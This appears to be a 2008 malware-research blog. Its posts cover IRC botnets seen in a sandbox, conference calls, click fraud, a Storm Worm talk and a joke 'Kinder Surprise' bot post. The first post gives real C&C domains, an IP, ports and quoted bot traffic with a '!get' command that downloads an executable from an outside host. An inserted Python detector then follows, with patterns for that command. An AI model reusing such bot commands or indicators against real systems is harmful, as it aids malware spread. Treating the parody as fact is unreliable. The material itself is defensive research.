Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we also receive lots of "uninteresting" files, like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware samples we receive a lot are the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of samples of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider has not yet reacted to abuse complaints, so I am publishing a few more details about this botnet - perhaps someone else can help. The botnet related to the first domain has its Command & Control server listening on TCP port 65520, while the second botnet has its C&C server on TCP port 80. An example of the bots' communication looks like:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
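
As an added example (not code from the post or from cwsandbox.org), here is how a defender could flag this traffic pattern in captured client-to-server IRC sessions: it scores the four features visible in the exchange above (an eight-letter random nick, the Windows service pack leaked in the USER realname field, a join to a "&" local channel, and a "!get <url>" download command) and extracts the download URL. The sample sessions, nick, channel and URL are constructed placeholders, not live indicators.

```python
import re

# Constructed sample modelled on the exchange quoted in the post; the
# download URL is a placeholder, not the live indicator from the page.
SAMPLE_SESSION = [
    "NICK rzyaaqgs",
    "USER f020501 . . :-Service Pack 2",
    "JOIN &virtu",
    ":* PRIVMSG rzyaaqgs :!get http://bad.example/payload.exe",
]

# Constructed benign session for comparison.
BENIGN_SESSION = [
    "NICK alice",
    "USER alice 0 * :Alice Example",
    "JOIN #python",
    ":bob!b@host PRIVMSG #python :hello everyone",
]

NICK_RE = re.compile(r"^NICK\s+([a-z]{8})$")  # eight random lowercase letters
# Realname field carrying the victim's service pack instead of a name.
USER_RE = re.compile(r"^USER\s+\S+\s+\S+\s+\S+\s+:-?Service Pack \d")
JOIN_RE = re.compile(r"^JOIN\s+&\S+")  # '&' local channel, rare for humans
# Bot download command: "!get <url>" sent via PRIVMSG.
GET_RE = re.compile(r"PRIVMSG\s+\S+\s+:!get\s+(https?://\S+)")


def analyze_irc_session(lines):
    """Score one IRC session and pull out any !get download URLs."""
    indicators = []
    urls = []
    for line in lines:
        line = line.rstrip("\r\n")
        if NICK_RE.match(line):
            indicators.append("random_8char_nick")
        elif USER_RE.match(line):
            indicators.append("os_version_in_realname")
        elif JOIN_RE.match(line):
            indicators.append("joins_local_channel")
        m = GET_RE.search(line)
        if m:
            indicators.append("get_download_command")
            urls.append(m.group(1))
    # A download command alone is decisive; otherwise require two weak signals.
    suspicious = "get_download_command" in indicators or len(indicators) >= 2
    return {"indicators": indicators, "download_urls": urls, "suspicious": suspicious}


if __name__ == "__main__":
    print(analyze_irc_session(SAMPLE_SESSION))
    print(analyze_irc_session(BENIGN_SESSION))
```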

SPRING 3

Saturday, May 31. 2008
This is a Call for Abstracts for a German workshop for young researchers, thus the following text is in German only.

---------------------------------------------------------------
Arbeitest Du auf dem Gebiet der Reaktiven Sicherheit?

Willst Du Dich mit anderen fachlich austauschen?

Dann haben wir etwas für Dich: Die Fachgruppe SIDAR ("Security - Intrusion Detection and Response") der Gesellschaft für Informatik e.V. veranstaltet die dritte SPRING. SPRING bietet Nachwuchswissenschaftlern auf dem Gebiet der Reaktiven Sicherheit eine Plattform, um themenbezogen Kontakte über die eigene Universität hinaus zu knüpfen. In diesem Jahr findet SPRING am 8. August an der Universität Mannheim statt.

Wir laden Diplomanden und Doktoranden ein, ihre Beiträge zu präsentieren. Die Vorträge können ein breites Spektrum abdecken, von noch laufenden Projekten, die ggf. erstmals einem breiteren Publikum vorgestellt werden, bis zu abgeschlossenen Forschungsarbeiten, die zeitnah auch auf Konferenzen präsentiert wurden bzw. werden sollen oder einen Schwerpunkt der eigenen Diplomarbeit oder Dissertation bilden.

Das Themenspektrum der Reaktiven Sicherheit beinhaltet:
  • Verwundbarkeitsanalyse
  • Intrusion Detection
  • Malware
  • Incident Management
  • Forensik

Mehr Informationen: SPRING 3 Webseite.
---------------------------------------------------------------

Botnets & Click-Fraud

Friday, May 30. 2008
Dancho Danchev recently had an article about "Botnets committing click fraud observed". The article had a screenshot of statistics for one botnet; here are two more examples:

The bots search for content and then also click on links, in order to gain some revenue via pay-per-click advertising. While there seem to be several such botnets in the wild, the overall number is presumably rather small. At least the current IRC botnets which we track here at our lab only very seldom show signs of committing click-fraud.

If someone has samples of malware committing click-fraud or more information on this topic, please send me an e-mail!

Storm Worm Presentation

Thursday, May 29. 2008
Two days ago I gave a presentation at IT-Sicherheits-Forum, a German conference on IT security, on Storm Worm. The presentation is now available. It provides an overview of Storm Worm and highlights various aspects of the botnet. The presentation is an extended version of our LEET'08 paper on the same topic.

Storm is still an interesting botnet. However, the botnet is getting smaller and smaller - nowadays there are typically less than ten thousand machines online on a given day. Seems like the good ol' days of Storm are over...

Call for Papers: EC2ND'08

Wednesday, May 14. 2008
The CFP for the fourth annual European Conference on Computer Network Defense (EC2ND'08) is up online at http://2008.ec2nd.org/.

The conference will take place on December 11th & 12th 2008 in the Faculty of Engineering and Computing at Dublin City University. The theme of the conference is the protection of computer networks. As with past EC2ND conferences, this year's event will encourage participants from academia and industry within Europe and beyond to discuss current topics in applied network and systems security.

EC2ND 2008 invites submissions presenting novel ideas at an early stage with the intention to act as a discussion forum and feedback channel for promising, innovative security research. While our goal is to solicit ideas that are not completely worked out, and might have challenging and interesting open questions, we expect submissions to be supported by some evidence of feasibility or preliminary quantitative results.

Important Dates:
Paper Submission Deadline: September 1st, 2008
Notification of Acceptance: September 18th, 2008
Final Paper Due: October 1st, 2008
Conference Dates: December 11th & 12th, 2008

You can find more information at http://2008.ec2nd.org/.

New Bot-Family Detected: Light-Bots

Thursday, May 8. 2008
Today, we observed a new family of bots while doing some research at our lab. While investigating several Kinder Surprises, we detected two samples of a bot family named Light-Bots (see the picture for more detail about the bots).

A closer analysis revealed that the bot exists in at least two versions; we empirically found versions S104 and S105. The propagation scheme is a variant of classical social engineering: victims are tricked into buying a Kinder Surprise, and the bot is contained in the egg, similar to a Trojan Horse. At this point, we do not have any CWSandbox report of the bot's behavior nor any signatures. However, the bot also contains a README that indicates a close relationship with the domain www.magic-kinder.com: